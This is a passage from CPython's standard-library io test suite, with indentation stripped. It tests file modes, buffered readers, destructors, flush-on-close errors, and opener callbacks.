for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
        # On Windows and Mac OSX this test consumes large resources; it takes
# a long time to build the >2 GiB file and takes >2 GiB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2 GiB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(support.TESTFN))
check_path_succeeds(FakePath(support.TESTFN.encode('utf-8')))
with self.open(support.TESTFN, "w") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(support.TESTFN), 'rwxa')
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
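        # sys.getsizeof() includes the internal buffer, so subtracting the
        # buffer size isolates the fixed per-object overhead, which must not
        # depend on buffer_size.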
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
    def test_buffer_freeing(self):
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
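        # tp.__new__ builds the object without running __init__; using it
        # in that state must raise cleanly rather than crash.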
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
